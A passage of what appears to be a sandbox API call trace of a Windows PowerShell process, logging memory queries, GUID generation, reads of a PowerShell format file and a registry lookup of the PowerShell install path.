	[0296.199] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.199] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xfce033b6, Data2=0x11e0, Data3=0x467a, Data4=([0]=0xba, [1]=0xbc, [2]=0xc6, [3]=0x58, [4]=0x17, [5]=0x4d, [6]=0xfd, [7]=0x9c))) returned 0x0
	[0296.200] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.200] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1ab7a0, lpBuffer=0x1ac660, dwLength=0x30 | out: lpBuffer=0x1ac660*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.201] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.202] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.202] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x54b38d51, Data2=0xe830, Data3=0x4f07, Data4=([0]=0x96, [1]=0x3c, [2]=0xb3, [3]=0x28, [4]=0xe5, [5]=0x69, [6]=0x6e, [7]=0x91))) returned 0x0
	[0296.202] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x40f9cb22, Data2=0xe9ef, Data3=0x4d8c, Data4=([0]=0x8d, [1]=0x89, [2]=0x55, [3]=0xfe, [4]=0x5d, [5]=0x91, [6]=0x4a, [7]=0x54))) returned 0x0
	[0296.202] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x98575cf5, Data2=0xddd9, Data3=0x470c, Data4=([0]=0xbd, [1]=0xb7, [2]=0x82, [3]=0x53, [4]=0x81, [5]=0x4c, [6]=0xec, [7]=0x11))) returned 0x0
	[0296.202] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xbbe95220, Data2=0x7a11, Data3=0x493c, Data4=([0]=0xb0, [1]=0xcc, [2]=0x10, [3]=0x3, [4]=0x92, [5]=0x90, [6]=0x41, [7]=0x15))) returned 0x0
	[0296.202] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x1c71e219, Data2=0xf565, Data3=0x426d, Data4=([0]=0x8a, [1]=0x7, [2]=0x7a, [3]=0x74, [4]=0xf9, [5]=0xee, [6]=0xb3, [7]=0x16))) returned 0x0
	[0296.203] VirtualQuery (in: lpAddress=0x1ab8b0, lpBuffer=0x1ac770, dwLength=0x30 | out: lpBuffer=0x1ac770*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.203] VirtualQuery (in: lpAddress=0x1ab940, lpBuffer=0x1ac800, dwLength=0x30 | out: lpBuffer=0x1ac800*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.203] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb5c4a1ba, Data2=0x592, Data3=0x46ac, Data4=([0]=0xa4, [1]=0x5e, [2]=0x81, [3]=0xae, [4]=0xd0, [5]=0xf1, [6]=0xa0, [7]=0x2c))) returned 0x0
	[0296.203] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xa51c600f, Data2=0xd138, Data3=0x4854, Data4=([0]=0x83, [1]=0x2b, [2]=0xe8, [3]=0xa3, [4]=0x24, [5]=0x71, [6]=0xc0, [7]=0xf7))) returned 0x0
	[0296.203] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x646000cd, Data2=0xaa2a, Data3=0x4a66, Data4=([0]=0xaf, [1]=0xa2, [2]=0x2, [3]=0x26, [4]=0xe9, [5]=0x10, [6]=0x18, [7]=0xdd))) returned 0x0
	[0296.203] SetErrorMode (uMode=0x1) returned 0x1
	[0296.204] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0296.204] GetFileType (hFile=0x32c) returned 0x1
	[0296.204] SetErrorMode (uMode=0x1) returned 0x1
	[0296.204] GetFileType (hFile=0x32c) returned 0x1
	[0296.204] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.205] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.205] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.205] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.205] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.206] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.206] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.206] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.206] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.207] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.207] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.207] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.208] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.208] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.208] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.208] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.208] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.209] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.209] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.210] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.210] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.210] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0xe67, lpOverlapped=0x0) returned 1
	[0296.210] ReadFile (in: hFile=0x32c, lpBuffer=0x3244177, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244177*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.210] ReadFile (in: hFile=0x32c, lpBuffer=0x3244ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3244ba8*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.210] CloseHandle (hObject=0x32c) returned 1
	[0296.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0296.211] SetErrorMode (uMode=0x1) returned 0x1
	[0296.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0296.211] SetErrorMode (uMode=0x1) returned 0x1
	[0296.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0296.211] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x32c) returned 0x0
	[0296.211] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0296.211] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea6d0
	[0296.211] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x1b6ea6d0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0296.211] CoTaskMemFree (pv=0x1b6ea6d0) 
	[0296.211] RegCloseKey (hKey=0x32c) returned 0x0
	[0296.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0296.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd0f5d8a9, Data2=0x99c6, Data3=0x4afb, Data4=([0]=0xaf, [1]=0xbf, [2]=0xcf, [3]=0x25, [4]=0xf3, [5]=0x40, [6]=0xc7, [7]=0x3d))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x2d828aac, Data2=0x8e77, Data3=0x4dc3, Data4=([0]=0xaa, [1]=0xb2, [2]=0xae, [3]=0xb, [4]=0xba, [5]=0x1f, [6]=0x37, [7]=0xce))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb8b58178, Data2=0x2f0c, Data3=0x4f48, Data4=([0]=0xbf, [1]=0xfb, [2]=0x29, [3]=0x9c, [4]=0xcf, [5]=0x4, [6]=0x2f, [7]=0x14))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x5b1200d2, Data2=0x7b02, Data3=0x4e2f, Data4=([0]=0xac, [1]=0x33, [2]=0xac, [3]=0xb6, [4]=0x8d, [5]=0xbc, [6]=0x4a, [7]=0x3f))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xbc04af72, Data2=0x97f8, Data3=0x44e5, Data4=([0]=0xb4, [1]=0xe4, [2]=0xbb, [3]=0x88, [4]=0x79, [5]=0x62, [6]=0x9b, [7]=0xf7))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xfa7132d6, Data2=0x9f67, Data3=0x42d2, Data4=([0]=0xae, [1]=0x7a, [2]=0xf3, [3]=0xbd, [4]=0xa9, [5]=0x6b, [6]=0x18, [7]=0xcc))) returned 0x0
	[0296.213] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x6eb4313f, Data2=0x289f, Data3=0x4b21, Data4=([0]=0xb7, [1]=0x9b, [2]=0x8d, [3]=0xf9, [4]=0x4e, [5]=0x24, [6]=0x6d, [7]=0x37))) returned 0x0
	[0296.213] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf7c0e26e, Data2=0xa19, Data3=0x4aef, Data4=([0]=0x81, [1]=0x7b, [2]=0x5f, [3]=0xb8, [4]=0x46, [5]=0xa0, [6]=0x74, [7]=0xaa))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x53b32aab, Data2=0xb025, Data3=0x4161, Data4=([0]=0x8c, [1]=0xb7, [2]=0x4d, [3]=0x77, [4]=0x71, [5]=0x61, [6]=0xd7, [7]=0x3b))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4519b010, Data2=0x5781, Data3=0x44b9, Data4=([0]=0xbb, [1]=0x97, [2]=0xb8, [3]=0x72, [4]=0x93, [5]=0x81, [6]=0xcb, [7]=0x72))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x1d0f48d1, Data2=0xfe94, Data3=0x4be8, Data4=([0]=0xb6, [1]=0x39, [2]=0xb2, [3]=0x87, [4]=0x21, [5]=0x9f, [6]=0x4f, [7]=0xab))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x702d3ab4, Data2=0xd68d, Data3=0x4148, Data4=([0]=0x94, [1]=0xcb, [2]=0xf7, [3]=0xff, [4]=0x40, [5]=0xba, [6]=0x30, [7]=0x58))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x53319b36, Data2=0xdf68, Data3=0x4a9a, Data4=([0]=0x80, [1]=0x6b, [2]=0xd0, [3]=0x40, [4]=0x14, [5]=0x9d, [6]=0x18, [7]=0xf4))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xafb4f98d, Data2=0xd258, Data3=0x4628, Data4=([0]=0x8e, [1]=0xf6, [2]=0x23, [3]=0x28, [4]=0x95, [5]=0xa5, [6]=0xc1, [7]=0x62))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x40551723, Data2=0x825d, Data3=0x4d1f, Data4=([0]=0xaf, [1]=0x3c, [2]=0x71, [3]=0x5e, [4]=0xaf, [5]=0x6b, [6]=0xf0, [7]=0x6d))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd11e687f, Data2=0xcbb0, Data3=0x4a0d, Data4=([0]=0xbb, [1]=0x4, [2]=0x5d, [3]=0x79, [4]=0x79, [5]=0xe6, [6]=0x99, [7]=0x1e))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x6619cd59, Data2=0x616c, Data3=0x4701, Data4=([0]=0xa9, [1]=0x3d, [2]=0xa2, [3]=0x48, [4]=0x98, [5]=0x35, [6]=0xd0, [7]=0x16))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xa5362f9a, Data2=0x66ba, Data3=0x4d24, Data4=([0]=0xb4, [1]=0x80, [2]=0x6b, [3]=0xe, [4]=0xe5, [5]=0x25, [6]=0x96, [7]=0x29))) returned 0x0
	[0296.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x183d7c4c, Data2=0x746d, Data3=0x474c, Data4=([0]=0xa1, [1]=0xf, [2]=0xb, [3]=0xf7, [4]=0x75, [5]=0x1e, [6]=0xa3, [7]=0xd0))) returned 0x0
	[0296.215] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.215] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
